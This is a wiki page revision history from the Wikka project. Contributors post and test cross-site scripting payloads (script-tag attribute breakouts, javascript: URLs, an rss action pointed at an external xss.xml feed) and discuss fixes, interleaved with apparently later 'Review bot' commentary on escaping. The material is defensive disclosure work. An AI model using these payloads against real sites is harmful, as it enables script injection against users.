Revision history for MySandbox


Revision [19443]

Last edited on 2008-01-28 00:16:02 by JavaWoman [Modified links pointing to docs server]

No Differences

Revision [17834]

Edited on 2007-12-12 13:14:37 by JavaWoman [prevent function references looking as page links]
Additions:
I just patched up the actions to feed the appropriate items through ""ReturnSafeHTML()"".
Deletions:
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().


Revision [16968]

Edited on 2007-05-31 23:27:31 by DreckFehler [Reverted]
Additions:
for ($a = 0; $a < count($matches[0]); $a++) {
Deletions:
for ($a = 0; $a < count($matches[0]); $a ) {


Revision [16767]

Edited on 2007-05-31 10:45:46 by YmjNb5 [Reverted]
Additions:
for ($a = 0; $a < count($matches[0]); $a ) {
Deletions:
for ($a = 0; $a < count($matches[0]); $a++) {
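Review bot: the new loop header `for ($a = 0; $a < count($matches[0]); $a ) {` drops the `++` from the step expression, so `$a` is never incremented and the loop never terminates whenever `$matches[0]` has at least one element. A bare `$a` is a valid expression in that position, so PHP accepts the file and the failure only shows at run time as a hung request. The deleted line with `$a++` is the correct one; revision [16968] restores it.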


Revision [937]

Edited on 2004-08-08 18:47:18 by DreckFehler [moved rss-caching stuff]
Additions:
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of romans exploit's hook in.
Hey Dreck, I do have a request.
although the problem is solved, moved the stuff to CachingRSS and added some remarks
thanks ;) and (of course) thanks for the hint! --DreckFehler
Deletions:
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of iwans exploit's hook in.
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
Update: Nevermind the plea. I'm going to use PHP's parse_url().
test test2


Revision [936]

Edited on 2004-08-08 17:26:06 by RomanIvanov [Said thanks to Wikka team =)]
Additions:
Good work, guys =)
-- RomanIvanov


Revision [934]

Edited on 2004-08-08 15:09:22 by JsnX [testing]
Additions:
test test2
Deletions:
test


Revision [932]

Edited on 2004-08-08 14:34:00 by JsnX [testing]
Additions:
test


Revision [930]

Edited on 2004-08-08 14:11:58 by JsnX [all set....]
Additions:
Update: Nevermind the plea. I'm going to use PHP's parse_url().


Revision [929]

Edited on 2004-08-08 13:11:21 by JsnX [Plea for help fom DreckFehler :)]
Additions:
----
Yeah, that Roman guy is a big trouble-maker. ;)
I just patched up the actions to feed the appropriate items through ReturnSafeHTML().
Hey Dreck, I do have a request. You seem pretty handy with regular expressions; would you mind whipping one up for me?
Given a URL, http://domain.com/feed.xml, I'd like to extract domain and feed, and then gel them together, domainfeed.
This way I can make all RSS requests cache by default, which will alleviate some of the bandwidth concerns.
In the RSS action, I'll check to see if the user has specified a cache file, and if not, I'll set it to domainfeed.xml.
What do you think?
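Review bot: routing each parameter through `ReturnSafeHTML()` inside the action that emits it is the better shape than the global `htmlentities()` pass in revision [927], but it is opt-in: every action has to remember to do it for every parameter it writes out, so the change should record which actions and parameters were covered (the table `cellpadding`, googleform `q` and image `url` cases from the earlier revisions at minimum). If `ReturnSafeHTML()` is an HTML sanitiser rather than an attribute encoder, values that land inside an attribute (`cellpadding`, `q`) still need `'`, `"`, `<` and `>` encoded, which a tag whitelist does not by itself guarantee. On the cache-name request: `parse_url()` yields host and path, but the path part still has to be reduced to a safe basename before it is used as a filename under the cache directory.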


Revision [928]

Edited on 2004-08-08 12:50:33 by JsnX [fixed XSS risks that Roman pointed out]
Additions:
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''
''Fixed in Wikka 1.1.3.8 -- JsnX''


Revision [927]

Edited on 2004-08-08 12:11:14 by DreckFehler [a trial to fix that exploit]
Additions:
any suggestions how to address this issue?
here is mine (which doesn't fix the rss-exploit, but i seem to have some more general probs with the rss-action in my wikka-installation. and this exploit isn't located in the parameter-handling. it has to be handled in the rss-action itself):
%%(php)<?
if (is_array($matches)) {
for ($a = 0; $a < count($matches[0]); $a++) {
$vars[$matches[1][$a]] = htmlentities($matches[2][$a], ENT_QUOTES);
}
}
$vars["wakka_vars"] = htmlentities(trim($vars_temp), ENT_QUOTES);
?>%%
**attention:** this hack may confuse some actions, which aren't aware that the parameters now are passed over as htmlentities! it may be sufficient to treat only the occurance of single quotes, since this is the point where the first two of iwans exploit's hook in.
i hate that guys who cause problems but omit the solutions ;)
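Review bot: applying `htmlentities(..., ENT_QUOTES)` to every action parameter at parse time encodes values before anyone knows which context they will be used in; a parameter that an action later uses as something other than HTML text (the rss action's `url`, which is fetched, or `cache`, which names a file) now carries `&quot;`, `&#039;` and `&amp;` sequences, which is exactly the confusion the attention note anticipates. Encoding at the point each action writes a value into its output keeps the raw value available and lets the action choose attribute or text encoding. The same hunk's `$vars["wakka_vars"] = htmlentities(trim($vars_temp), ENT_QUOTES);` has the same problem for any code that re-reads the raw parameter string. For the breakout payloads shown on this page (`'`, `>`, `<`), `htmlspecialchars()` with `ENT_QUOTES` is sufficient and leaves non-ASCII text untouched, so it is the safer choice than `htmlentities()` here.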


Revision [926]

Edited on 2004-08-08 07:29:02 by RomanIvanov [a trial to fix that exploit]
Additions:
====rss action has an XSS and also supposed unsafe because any malefactor can generated BIG amount of incoming traffic, which may be expensive.====
Deletions:
Hmm.
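Review bot: the traffic point in the new heading is a separate issue from the XSS and needs its own fix: every render of a page carrying `{{rss url=...}}` fetches the remote URL unless `cache` is given, so a page author can make the server pull an arbitrary, arbitrarily large resource on every view. Caching by default (the request in revision [929]) limits the fetch rate; a size cap and a timeout on the fetch, and a restriction to http and https targets, limit the cost of each fetch. Both belong in the rss action itself, not in parameter parsing.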


Revision [925]

Edited on 2004-08-08 07:25:59 by RomanIvanov [a trial to fix that exploit]
Additions:
{{rss url="http://ar.sky.ru/xss.xml" cache="cachef.xml"}}
Deletions:
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}
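Review bot: the `url` now points at a feed named `xss.xml`, so the injected markup arrives in the fetched feed body rather than in the action's parameters; escaping `$vars` (revision [927]) cannot touch it, as DreckFehler notes, and the rss action has to encode the title, link and description of each item when it writes them into the page. The `cache` parameter deserves a look in the same pass: it is a page-author-supplied filename that the action writes to, so it should be reduced to a basename inside the cache directory rather than used as given.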


Revision [924]

Edited on 2004-08-08 07:22:05 by RomanIvanov [a trial to fix that exploit]
Additions:
Hmm.
{{rss url="http://ar.sky.ru/txt/export.xml" cache="cachefilename.xml"}}


Revision [923]

Edited on 2004-08-08 07:15:43 by RomanIvanov [a trial to fix that exploit]
Additions:
====table action has an XSS.====
====googleform action has an XSS.====
Deletions:
table action has an XSS.


Revision [922]

Edited on 2004-08-08 07:15:20 by RomanIvanov [a trial to fix that exploit]
Additions:
table action has an XSS.
{{googleform q="'><script>alert(2)</script>"}}


Revision [921]

Edited on 2004-08-08 07:14:10 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellpadding="'><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
{{table cellpadding="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
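Review bot: the change from `><script>` to `'><script>` in `cellpadding` shows the value is emitted inside a single-quoted attribute, which is why the later note in revision [937] suggests treating only `'`. That is too narrow: an action that emits `attr="..."` is broken out with `">` instead, and a value emitted outside any attribute needs `<` encoded. Encoding `'`, `"`, `<`, `>` and `&` (`htmlspecialchars()` with `ENT_QUOTES`) covers all three contexts with one call.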


Revision [920]

Edited on 2004-08-08 07:13:31 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellpadding="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
{{table cellspacing="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}


Revision [919]

Edited on 2004-08-08 07:13:07 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellspacing="><script>alert(1);</script>" columns="3" cells="**BIG**;**GREEN**;**FROGS**;yes;yes;no;no;yes;yes"}}
Deletions:
{{table cellspacing="><script>alert(1);</script>"}}


Revision [918]

Edited on 2004-08-08 07:11:15 by RomanIvanov [a trial to fix that exploit]
Additions:
{{table cellspacing="><script>alert(1);</script>"}}
Deletions:
{{image url="javascript:alert('1')"}}
seems to be it's an XSS security hole.
// Fixed. 5/8/04 - JsnX//
It's not last XSS bug here.
// Do you still see others? 5/8/04 - JsnX//
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.


Revision [262]

Edited on 2004-05-10 03:46:18 by RomanIvanov [a trial to fix that exploit]
Deletions:
[[javascript:alert(1)]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]


Revision [261]

Edited on 2004-05-10 03:45:32 by RomanIvanov [a trial to fix that exploit]
Additions:
[[javascript:alert(1)]]
[[<script>alert(1)</script>]]
[[MySandbox <script>alert(1)</script>]]
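Review bot: these three link tests exercise two different escapes in the link formatter: `[[javascript:alert(1)]]` needs the target's scheme checked before it becomes an `href` (encoding the text does not help, since the payload contains nothing that encoding changes), while `[[<script>alert(1)</script>]]` and `[[MySandbox <script>alert(1)</script>]]` need the link text encoded as HTML. A fix that handles only one of the two leaves the other open.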


Revision [260]

Edited on 2004-05-09 17:20:26 by RomanIvanov [a trial to fix that exploit]
Additions:
http://wikka.jsnx.com/MySandbox/referrers
For more, please send me your formatters/* files.


Revision [253]

Edited on 2004-05-08 14:47:30 by 217.114.9.102 [a trial to fix that exploit]
Deletions:
~-autoindent
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar


Revision [252]

Edited on 2004-05-08 14:47:17 by 217.114.9.102 [a trial to fix that exploit]
Additions:
~-autoindent
~-shortcuts
~-fsdgdfg
~~-fgdfg
~~-dddd
~-toolbar


Revision [251]

Edited on 2004-05-08 13:13:25 by JsnX [a trial to fix that exploit]
Additions:
// Fixed. 5/8/04 - JsnX//
// Do you still see others? 5/8/04 - JsnX//


Revision [250]

Edited on 2004-05-08 12:47:55 by JsnX [a trial to fix that exploit]
Additions:
{{image url="javascript:alert('1')"}}
Deletions:
{{image url="images/dvdvideo.gif" alt="javascript:alert('1')"}}
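Review bot: the `url="javascript:alert('1')"` case is a URL-scheme problem, not a markup-escaping one: the payload contains no `<`, `>` or `"` to encode, and browsers decode entities in attribute values before interpreting the URL, so `&#039;` in place of `'` does not stop it. The fix for `url` is to check the scheme before emitting it as `src` (allow http, https and relative paths; reject everything else), with attribute escaping on top for breakout. The `title`, `class` and `alt` variants tried in revisions [244] to [249] are the escaping case; a `javascript:` string in those attributes does not execute by itself.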


Revision [249]

Edited on 2004-05-08 12:41:15 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvdvideo.gif" alt="javascript:alert('1')"}}
Deletions:
{{image url="images/dvdvideo.gif" class="javascript:alert('1')"}}


Revision [248]

Edited on 2004-05-08 12:40:12 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvdvideo.gif" class="javascript:alert('1')"}}
Deletions:
{{image url="images/dvdvideo.gif" title="javascript:alert('1')"}}


Revision [247]

Edited on 2004-05-08 12:39:49 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvdvideo.gif" title="javascript:alert('1')"}}
Deletions:
{{image url="images/dvd.gif" title="javascript:alert('1')"}}


Revision [246]

Edited on 2004-05-08 12:39:39 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images/dvd.gif" title="javascript:alert('1')"}}
Deletions:
{{image url="images\dvd.gif" title="javascript:alert('1')"}}


Revision [245]

Edited on 2004-05-08 12:39:06 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images\dvd.gif" title="javascript:alert('1')"}}
Deletions:
{{image url="images\dvd" title="javascript:alert('1')"}}


Revision [244]

Edited on 2004-05-08 12:38:41 by JsnX [a trial to fix that exploit]
Additions:
{{image url="images\dvd" title="javascript:alert('1')"}}
Deletions:
{{image url="javascript:alert('1')"}}


Revision [238]

Edited on 2004-05-03 20:33:18 by RomanIvanov [Security hole found.]
Additions:
It's not last XSS bug here.


Revision [232]

Edited on 2004-05-03 20:13:14 by 80.78.105.158 [Security hole found.]
Additions:
seems to be it's an XSS security hole.


Revision [231]

The oldest known version of this page was created on 2004-05-03 20:12:12 by 80.78.105.158 [Security hole found.]